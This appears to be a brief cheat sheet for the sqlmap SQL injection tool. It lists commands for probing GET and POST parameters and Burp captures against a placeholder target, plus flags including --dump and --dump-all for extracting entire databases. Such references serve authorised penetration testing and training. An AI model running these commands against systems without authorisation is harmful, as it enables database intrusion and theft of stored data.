https://github.com/sqlmapproject/sqlmap
GET Parameter
sqlmap -u "http://[TARGET_IP]/books?author=Bob" -p authorLook for SQL injection in author parameter.
POST Parameter
sqlmap -u "http://[TARGET_IP]/search" --data="name=Bob"Look for SQL injection in post parameter.
Burp Capture
sqlmap -r [fileFromBurpIntercept] --batchLook for SQL injection from a BurpSuite capture.
Flags
-pProvide parameter which seems to be injectable.
-uProvide URL for the attack.
--dbmsTell SQLMap the type of database that is running.
--dumpDump the data within the database that the application uses. --dump-allDump the ENTIRE database.
--batchSQLMap will run automatically and won't ask for user input.